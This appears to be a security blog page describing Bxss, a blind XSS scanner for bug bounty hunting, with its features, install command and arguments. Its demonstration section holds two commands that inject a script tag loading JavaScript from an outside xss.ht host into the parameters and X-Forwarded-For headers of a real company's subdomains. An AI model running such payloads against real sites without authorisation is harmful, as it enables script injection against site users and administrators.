Offensive Security Tool: Bxss – Blind XSS Scanner
Reading Time: 2 Minutes
Bxss – Blind XSS Scanner
Bxss – Blind XSS Scanner, developed by ethicalhackingplayground, is a tool designed to detect blind Cross-Site Scripting (XSS) vulnerabilities in web applications by injecting custom payloads into headers and parameters. Unlike traditional XSS, blind XSS triggers in scenarios where the injected payload is stored and executed asynchronously, such as in admin panels, logging systems, or third-party integrations.
See Also: A Practical Guide to Hacking Techniques for finding Top Bugs.
The Bug Bounty Hunting Course
Features
- Inject Blind XSS payloads into custom headers
- Inject Blind XSS payloads into parameters
- Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
- Tool Chaining
- Really fast
- Easy to setup
Install
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
See Also: Recon Tool: Argus
Arguments
| Argument | Description | Default |
|---|---|---|
-appendMode | Append the payload to the parameter | |
-concurrency int | Set the concurrency | 30 |
-header string | Set the custom header | “User-Agent” |
-headerFile string | Path to file containing headers to test | |
-parameters | Test the parameters for blind xss | |
-payload string | The blind XSS payload | |
-payloadFile string | Path to file containing payloads to test |
Demonstration
Blind XSS In Parameters
subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parametersBlind XSS In X-Forwarded-For Header
subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"
Clone the repo from here: GitHub Link
Recent Tools
Vulnerability Management Tool: CVE Prioritizer
CVE Prioritizer is a vulnerability management tool designed to help …Offensive Security Tool: HExHTTP
HExHTTP is a tool designed to perform tests on HTTP …Recon Tool: getJS
getJS is a tool designed for extracting JavaScript sources from …Digital Forensics Tool: MemProcFS-Analyzer
MemProcFS-Analyzer is a PowerShell script designed to streamline memory forensics …
Offensive Security & Ethical Hacking Course
Begin the learning curve of hacking now!
Information Security Solutions
Find out how Pentesting Services can help you.
